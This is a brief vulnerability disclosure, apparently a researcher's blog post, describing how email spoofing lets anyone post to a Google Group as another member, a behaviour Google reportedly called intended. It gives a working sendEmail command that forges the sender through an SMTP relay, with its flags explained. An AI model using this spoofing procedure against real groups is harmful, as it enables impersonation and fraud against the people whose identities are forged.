Google Groups is a service from Google that provides discussion groups for people sharing common interests.Today I will be sharing one of my finding in Google group.Using this issue an attacker could’ve post on any user’s behalf.
Note:
“Google Mail is vulnerable to e-mail spoofing so this made the attack easy”
Steps to reproduce
1. Search group where we want to post a new topic.
2. spoof e-mail using below command I used smtp2go server.
sendEmail -f groupmember@gmail.com -t victim@googlegroups.com -u new topic -m mail -s mail.smtp2go.com:2525
f — victim email id
t — google group email
s — smtp server and port
I have already set IP authentication in smtp server which we don’t need authenticate using username and password
Refresh the group page and a post is made on victim’s behalf :”)
Timeline:
Reported: Aug 14,2017,6:24 PM
Google response: intended behavior!
